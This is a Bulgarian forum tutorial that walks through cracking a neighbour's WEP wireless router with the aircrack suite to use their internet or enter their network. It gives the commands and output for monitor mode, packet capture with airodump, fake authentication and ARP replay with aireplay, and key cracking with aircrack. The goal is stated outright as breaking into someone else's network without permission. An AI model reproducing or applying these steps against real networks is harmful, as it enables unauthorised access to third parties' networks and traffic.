- Изображение 1180 (25.31 KiB) Прегледано 16535 пъти
Ще разгледаме един вариант под Линукс как можем да хакнем Wireless рутер-а на съседа и да ползваме от него интернет или просто да влезем в мрежата му.
Ще разгледаме един способ който е с малко остаряла документация, но може в бъдеще да обновя командите, но са принципно сходни. Става въпрос за програмата AirCrack която я има за всички платформи и може да се ползва както за Linux, MacOSX, WIndows и т.н. за повече информация за програмата ще добавя линкове накрая.
В този експеримент ще използваме от този пакет програми airmon, airdump, airplay и aircrack.
За да можем да пуснем атаката и да разбием паролата на съседа ще са ни необходими много пакети които да колекционираме от него. Като например за 40-битов WEP ключ ще са ни необходими 300,000 пакета а за 104-битов ключ 1000000 пакета. Трябва да колекционираме pcap файлове с програмата airdump. Освен това трябва да направим неколкократно атака с която да разкачим съседа от Wireless рутера му така, че да можем да свалим пакетите при аутентикация към рутера.
Като начало трябва да пуснем Wireless устройството ни в режим на мониторинг и да почнем да сваляме информация, трябва да сме колкото се може по близо до рутера на съседа за да можем да приемем всички пакети пратени от съседа към рутера.
В този пример ще използваме мрежа която се казжа AirPlus на канал 11 с BSSID 00:13:46:A1:62:C4:
[root@phoenix:/home/johnycsh/Airplus]$ airmon.sh start ath0 11
[root@phoenix:/home/johnycsh/Airplus]$ airodump ath0 AirPlus 11
00:13:46:A1:62:C4 44 167 133 11 54. WEP AirPlus
След като сме запуснали снифера на информация, той е започнал да пише във файл AirPlus-01.pcap. А сега идва време да направим малко трафик за да не чакаме 10 дни съседа да се логва и разлогва от рутера си.
Ще ползваме програмата airplay с която като начало ще се опитаме да разлогнем съседа който вече е логнат (как да го разберем това ще го обясня в друга статия).
[root@phoenix:/home/johnycsh/Airplus]$ aireplay -1 0 -e AirPlus -a
00:13:46:A1:62:C4 -h 00:01:BA:DC:0D:ED ath0
22:59:35 Sending Authentication Request
22:59:35 Authentication successful
22:59:35 Sending Association Request
22:59:35 Association successful
Тук заявката я правим с MAC адрес 00:01:BA:DC:0D:ED който се предполага че е на съседа. така се опитваме да объркаме рутера и да го разкачим, след като се разкачи от рутера той се опитва да се върже отново и така четем пакетите при аутентикация. Но ако не сработи атаката няма проблем, ще използваме друга атака която повтаря пакетите който пристигат още по веднъж. Въпреки че са криптирани те са с еднаква големина и съдържание и няма да се отхвърлят от рутера.
[root@phoenix:/home/johnycsh/Airplus]$ aireplay -3 -b 00:13:46:A1:62:C4 -h
00:01:BA:DC:0D:ED ath0
Saving ARP requests in replay_arp-0423-230522.cap
You must also start airodump to capture replies.
Read 90788 packets (got 8 ARP requests), sent 45705 packets
След като вдигнахме достатъчно шум и събрахме достатъчно пакети за да можем да кракнем паролата на съседа си използваме програмата AirCrack с която четем складираните пакети с airdump.
[johnycsh@phoenix:~/Airplus]$ aircrack -0 -x ./AirPlus-01.cap
Opening ./AirPlus-01.cap
Read 84836 packets.
- Изображение 1179 (7.07 KiB) Прегледано 16416 пъти
Използвана е по стара документация от проекта AirCrack-NG
Свали от тук:
aircrack-ng-1.0-rc3.tar.gz- Aircrack версия 1.0-rc3
- (1.44 MiB) 1912 пъти
Свали от сайта: http://www.aircrack-ng.org/doku.php#download
